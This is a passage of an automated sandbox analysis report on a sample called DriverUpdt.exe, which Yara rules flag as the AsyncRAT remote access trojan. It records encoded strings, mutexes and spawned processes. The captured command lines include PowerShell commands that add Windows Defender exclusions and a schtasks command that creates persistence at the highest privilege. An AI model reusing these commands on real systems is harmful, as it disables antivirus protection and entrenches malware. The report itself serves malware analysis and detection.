                      Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000012.00000003.2732456791.000001BA75820000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.2127592677.0000029C74A39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5mConsumererv
                      Source: powershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: qmgr.db.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: DriverUpdt.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F016E90_2_00007FF848F016E9
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F06E420_2_00007FF848F06E42
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F023610_2_00007FF848F02361
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F060960_2_00007FF848F06096
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F020C10_2_00007FF848F020C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848FF30E98_2_00007FF848FF30E9
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 16_2_00007FF848F10E5E16_2_00007FF848F10E5E
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 16_2_00007FF848F116E916_2_00007FF848F116E9
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 16_2_00007FF848F120C116_2_00007FF848F120C1
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 20_2_00007FF848F10E5E20_2_00007FF848F10E5E
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 20_2_00007FF848F116E920_2_00007FF848F116E9
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 20_2_00007FF848F120C120_2_00007FF848F120C1
                      Source: DriverUpdt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: DriverUpdt.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: DriverUpdt.exe, rUq6Jc02GU46qh62C4zZA7O1E0dXcVGvvO.csCryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.exe, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csCryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.exe, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csCryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.0.dr, rUq6Jc02GU46qh62C4zZA7O1E0dXcVGvvO.csCryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.0.dr, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csCryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.0.dr, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, rUq6Jc02GU46qh62C4zZA7O1E0dXcVGvvO.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csCryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.exe, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csBase64 encoded string: 'Wzyx3ogwisD56ZHkeZYkSrNpO3P9J9Ya4nyydoyDoMhqYbxKcIuCBE6nN3TYLZ2YGky5qwMVXBL9OzBj6saB', 'pEkzOAOMKFgZeEjnqyOdb2Nj9rg4fsl4Zisct4e8rZI8GpWTmVRpZXVefi66KO0FkTsZhrE3OUXpJalOj9B4', 'lGz07EJSsiEZHWKf405VC86ML0pFtcYa9DnDdlCrv8J198USUtFcC4ga0h6D3ane7yoXgP11tbBX4iDkUJeS', 'uzJDSqDxIrlZJqgOgwwy02Dz2doW9zNtgu1RZfT5wLgCGy8fQt7HHJ5u3k7cpPtrQjj193zWKo4RHGr1PzX7', 'kqsk7TjkQbOMRQH2P9ywEPNbF2r2incAMN3K1h9sJhx31ygvXxpPnN8wj2WFZsTUvvige5ObtRYEs6EG9D5d', 'P3jsV4lZMIEXKaHtWScW7lMfH1M7bVzOGpyPzhtflSe30EwumuBRdb6vTpfKTXnCs0EyLA83RPn8nmd7hA8r', 'k4IiQb8aZFjA4MsRFkE6P0TsgsiT9f6t02Ntz9sOgXWs0Nq6T70LKbhfkD5ShI8LUSrbaaQww9YO7IZrSXnF', 'xvJbDZCgm7lSnBhfxWOa8zS4w0526chcn7corNxa5cWF1mWYKadtQLF52nm6cGvwuyZd0azWMYzWeLS9lcev', 'Kj3Vb6PzHn9v07t3S0MWBznTXF1PkRT8IPHe7b7iUzNIQpLOGQIuf7Qw6sSjOHLy50aTBV6HbQz1FEQxMDre', 'QKbzE0YySm8lR0erhsq4rtsTMCTOH8uWKlTWQEr6qzkkxB0tXX13kESSZQ0TzkUiVIYEu9h6AFhoAozuHLGP'
                      Source: DriverUpdt.exe, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csBase64 encoded string: 'uJIvKPRumgeUE7Cj6DUpv9OS9X3euISjlVu8QNQtltUm2IG3Y0JmlsPYPr5ci66SF5osCsrOnJPEtcePD1G1', 'XeZ2r4uLure0d6onZjoTUSlru3HjQ20XzQZ05KOuHMRAI6ctSnZGwEZJRRG3M7UxX1RD9uBRKZCu43NqpXe9'
                      Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csBase64 encoded string: 'RjaJGu3nFKjVX0HwnYwB9ectK5a6EyZDqeBpbfJVcWXzgU7cxwmplntKZbqu70u0hbw0FnnivfvskcF74o3X', 'IvZAem83h4vgpUmTHT5k0SVSUCWlugncvsAt7ObcW3MuzF5eUytFamzZuiXrAub6g02Vm5QmfvQ2cwbqj4la', 'JehyPCnBuflDs2d0ZYefcjO4JfBTQCC4HLKDhjmywyJhsaF0ReTf1GJEjxEzRWayaHAHaLzPSew8mvgAY6FW'
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csBase64 encoded string: 'QgYbC2WdwKektmrwVSQXk6yB1NWvPEcjEeToyahhlq2wGd2keQrLxcDZTSUuhiqBwcodSszv1cFVZTcbLUYG', 'LOItW6SfTfvWaylwjhr8yEPSu2oJNoipfHWhndegtyONdycme84WEpTTBJJRvJ2U0rJMqbypLQZqriyuT7ZF', 't4S9tOQRYlNxhhE3lGaEFj9w0rrpGEgUSTZZoE66qxJZ7b8bKsn3G7Mt5X3S0ek8qgwVxv0K2Nh0JtU10dzU', 'Gr0dgRT9Isqyej2OaWxQTnFzKcx1kBFZ5uOIm80jhCWNMjPhceWcm9NnYdffK4fsEtvcysr7sg1JiNCeAf8F', 'NlazytOCkJxJwpVPk1IrAOFlMhiOhspVn63UIEtpMtwhm3FYRAiovb3P0X46ChDgHL0EIk7IlbjJnl1lAeS7', 'NUuBK0NmuFzZbbySSf5FK8kHSSZm0lufbsLrlhDw5HpjaxmbDuT0LtPUl0dFcrMkO9oaw5pmkxmCP9GSEUPg', 'hiHZ8Pnec7U0fALizQIaJmM6g8cZwU9aRArhJKGki3eSsi1UsFEfwmhnDyDHSgK1m4pfZlBfNclcdrv7bGOQ', 'tMDOOGYeG5UTwVFxUwxNGqt9UgalFlhCPr2mz5FNJOQTPvRS97rqk0cdnmliTYB2t7MMupqVM3IJOmtdq0Y7', 'rirOR0AtWALUZeGM2S5EWjWocdeAroBLyFZ79l6Q2bnUw3TvKnxQ0OvfPOdvMFlZbOQj5fQM5duB2nBRcjaB'
                      Source: DriverUpdt.0.dr, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csBase64 encoded string: 'Wzyx3ogwisD56ZHkeZYkSrNpO3P9J9Ya4nyydoyDoMhqYbxKcIuCBE6nN3TYLZ2YGky5qwMVXBL9OzBj6saB', 'pEkzOAOMKFgZeEjnqyOdb2Nj9rg4fsl4Zisct4e8rZI8GpWTmVRpZXVefi66KO0FkTsZhrE3OUXpJalOj9B4', 'lGz07EJSsiEZHWKf405VC86ML0pFtcYa9DnDdlCrv8J198USUtFcC4ga0h6D3ane7yoXgP11tbBX4iDkUJeS', 'uzJDSqDxIrlZJqgOgwwy02Dz2doW9zNtgu1RZfT5wLgCGy8fQt7HHJ5u3k7cpPtrQjj193zWKo4RHGr1PzX7', 'kqsk7TjkQbOMRQH2P9ywEPNbF2r2incAMN3K1h9sJhx31ygvXxpPnN8wj2WFZsTUvvige5ObtRYEs6EG9D5d', 'P3jsV4lZMIEXKaHtWScW7lMfH1M7bVzOGpyPzhtflSe30EwumuBRdb6vTpfKTXnCs0EyLA83RPn8nmd7hA8r', 'k4IiQb8aZFjA4MsRFkE6P0TsgsiT9f6t02Ntz9sOgXWs0Nq6T70LKbhfkD5ShI8LUSrbaaQww9YO7IZrSXnF', 'xvJbDZCgm7lSnBhfxWOa8zS4w0526chcn7corNxa5cWF1mWYKadtQLF52nm6cGvwuyZd0azWMYzWeLS9lcev', 'Kj3Vb6PzHn9v07t3S0MWBznTXF1PkRT8IPHe7b7iUzNIQpLOGQIuf7Qw6sSjOHLy50aTBV6HbQz1FEQxMDre', 'QKbzE0YySm8lR0erhsq4rtsTMCTOH8uWKlTWQEr6qzkkxB0tXX13kESSZQ0TzkUiVIYEu9h6AFhoAozuHLGP'
                      Source: DriverUpdt.0.dr, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csBase64 encoded string: 'uJIvKPRumgeUE7Cj6DUpv9OS9X3euISjlVu8QNQtltUm2IG3Y0JmlsPYPr5ci66SF5osCsrOnJPEtcePD1G1', 'XeZ2r4uLure0d6onZjoTUSlru3HjQ20XzQZ05KOuHMRAI6ctSnZGwEZJRRG3M7UxX1RD9uBRKZCu43NqpXe9'
                      Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csBase64 encoded string: 'RjaJGu3nFKjVX0HwnYwB9ectK5a6EyZDqeBpbfJVcWXzgU7cxwmplntKZbqu70u0hbw0FnnivfvskcF74o3X', 'IvZAem83h4vgpUmTHT5k0SVSUCWlugncvsAt7ObcW3MuzF5eUytFamzZuiXrAub6g02Vm5QmfvQ2cwbqj4la', 'JehyPCnBuflDs2d0ZYefcjO4JfBTQCC4HLKDhjmywyJhsaF0ReTf1GJEjxEzRWayaHAHaLzPSew8mvgAY6FW'
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csBase64 encoded string: 'QgYbC2WdwKektmrwVSQXk6yB1NWvPEcjEeToyahhlq2wGd2keQrLxcDZTSUuhiqBwcodSszv1cFVZTcbLUYG', 'LOItW6SfTfvWaylwjhr8yEPSu2oJNoipfHWhndegtyONdycme84WEpTTBJJRvJ2U0rJMqbypLQZqriyuT7ZF', 't4S9tOQRYlNxhhE3lGaEFj9w0rrpGEgUSTZZoE66qxJZ7b8bKsn3G7Mt5X3S0ek8qgwVxv0K2Nh0JtU10dzU', 'Gr0dgRT9Isqyej2OaWxQTnFzKcx1kBFZ5uOIm80jhCWNMjPhceWcm9NnYdffK4fsEtvcysr7sg1JiNCeAf8F', 'NlazytOCkJxJwpVPk1IrAOFlMhiOhspVn63UIEtpMtwhm3FYRAiovb3P0X46ChDgHL0EIk7IlbjJnl1lAeS7', 'NUuBK0NmuFzZbbySSf5FK8kHSSZm0lufbsLrlhDw5HpjaxmbDuT0LtPUl0dFcrMkO9oaw5pmkxmCP9GSEUPg', 'hiHZ8Pnec7U0fALizQIaJmM6g8cZwU9aRArhJKGki3eSsi1UsFEfwmhnDyDHSgK1m4pfZlBfNclcdrv7bGOQ', 'tMDOOGYeG5UTwVFxUwxNGqt9UgalFlhCPr2mz5FNJOQTPvRS97rqk0cdnmliTYB2t7MMupqVM3IJOmtdq0Y7', 'rirOR0AtWALUZeGM2S5EWjWocdeAroBLyFZ79l6Q2bnUw3TvKnxQ0OvfPOdvMFlZbOQj5fQM5duB2nBRcjaB'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csBase64 encoded string: 'Wzyx3ogwisD56ZHkeZYkSrNpO3P9J9Ya4nyydoyDoMhqYbxKcIuCBE6nN3TYLZ2YGky5qwMVXBL9OzBj6saB', 'pEkzOAOMKFgZeEjnqyOdb2Nj9rg4fsl4Zisct4e8rZI8GpWTmVRpZXVefi66KO0FkTsZhrE3OUXpJalOj9B4', 'lGz07EJSsiEZHWKf405VC86ML0pFtcYa9DnDdlCrv8J198USUtFcC4ga0h6D3ane7yoXgP11tbBX4iDkUJeS', 'uzJDSqDxIrlZJqgOgwwy02Dz2doW9zNtgu1RZfT5wLgCGy8fQt7HHJ5u3k7cpPtrQjj193zWKo4RHGr1PzX7', 'kqsk7TjkQbOMRQH2P9ywEPNbF2r2incAMN3K1h9sJhx31ygvXxpPnN8wj2WFZsTUvvige5ObtRYEs6EG9D5d', 'P3jsV4lZMIEXKaHtWScW7lMfH1M7bVzOGpyPzhtflSe30EwumuBRdb6vTpfKTXnCs0EyLA83RPn8nmd7hA8r', 'k4IiQb8aZFjA4MsRFkE6P0TsgsiT9f6t02Ntz9sOgXWs0Nq6T70LKbhfkD5ShI8LUSrbaaQww9YO7IZrSXnF', 'xvJbDZCgm7lSnBhfxWOa8zS4w0526chcn7corNxa5cWF1mWYKadtQLF52nm6cGvwuyZd0azWMYzWeLS9lcev', 'Kj3Vb6PzHn9v07t3S0MWBznTXF1PkRT8IPHe7b7iUzNIQpLOGQIuf7Qw6sSjOHLy50aTBV6HbQz1FEQxMDre', 'QKbzE0YySm8lR0erhsq4rtsTMCTOH8uWKlTWQEr6qzkkxB0tXX13kESSZQ0TzkUiVIYEu9h6AFhoAozuHLGP'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csBase64 encoded string: 'uJIvKPRumgeUE7Cj6DUpv9OS9X3euISjlVu8QNQtltUm2IG3Y0JmlsPYPr5ci66SF5osCsrOnJPEtcePD1G1', 'XeZ2r4uLure0d6onZjoTUSlru3HjQ20XzQZ05KOuHMRAI6ctSnZGwEZJRRG3M7UxX1RD9uBRKZCu43NqpXe9'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csBase64 encoded string: 'RjaJGu3nFKjVX0HwnYwB9ectK5a6EyZDqeBpbfJVcWXzgU7cxwmplntKZbqu70u0hbw0FnnivfvskcF74o3X', 'IvZAem83h4vgpUmTHT5k0SVSUCWlugncvsAt7ObcW3MuzF5eUytFamzZuiXrAub6g02Vm5QmfvQ2cwbqj4la', 'JehyPCnBuflDs2d0ZYefcjO4JfBTQCC4HLKDhjmywyJhsaF0ReTf1GJEjxEzRWayaHAHaLzPSew8mvgAY6FW'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csBase64 encoded string: 'QgYbC2WdwKektmrwVSQXk6yB1NWvPEcjEeToyahhlq2wGd2keQrLxcDZTSUuhiqBwcodSszv1cFVZTcbLUYG', 'LOItW6SfTfvWaylwjhr8yEPSu2oJNoipfHWhndegtyONdycme84WEpTTBJJRvJ2U0rJMqbypLQZqriyuT7ZF', 't4S9tOQRYlNxhhE3lGaEFj9w0rrpGEgUSTZZoE66qxJZ7b8bKsn3G7Mt5X3S0ek8qgwVxv0K2Nh0JtU10dzU', 'Gr0dgRT9Isqyej2OaWxQTnFzKcx1kBFZ5uOIm80jhCWNMjPhceWcm9NnYdffK4fsEtvcysr7sg1JiNCeAf8F', 'NlazytOCkJxJwpVPk1IrAOFlMhiOhspVn63UIEtpMtwhm3FYRAiovb3P0X46ChDgHL0EIk7IlbjJnl1lAeS7', 'NUuBK0NmuFzZbbySSf5FK8kHSSZm0lufbsLrlhDw5HpjaxmbDuT0LtPUl0dFcrMkO9oaw5pmkxmCP9GSEUPg', 'hiHZ8Pnec7U0fALizQIaJmM6g8cZwU9aRArhJKGki3eSsi1UsFEfwmhnDyDHSgK1m4pfZlBfNclcdrv7bGOQ', 'tMDOOGYeG5UTwVFxUwxNGqt9UgalFlhCPr2mz5FNJOQTPvRS97rqk0cdnmliTYB2t7MMupqVM3IJOmtdq0Y7', 'rirOR0AtWALUZeGM2S5EWjWocdeAroBLyFZ79l6Q2bnUw3TvKnxQ0OvfPOdvMFlZbOQj5fQM5duB2nBRcjaB'
                      Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@21/25@2/3
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile created: C:\Users\user\AppData\Roaming\DriverUpdtJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtMutant created: NULL
                      Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                      Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                      Source: C:\Users\user\Desktop\DriverUpdt.exeMutant created: \Sessions\1\BaseNamedObjects\4fPEH1k67YijypJe
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                      Source: DriverUpdt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DriverUpdt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DriverUpdt.exeReversingLabs: Detection: 84%
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile read: C:\Users\user\Desktop\DriverUpdt.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DriverUpdt.exe "C:\Users\user\Desktop\DriverUpdt.exe"
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
                      Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: userenv.dllJump to behavior
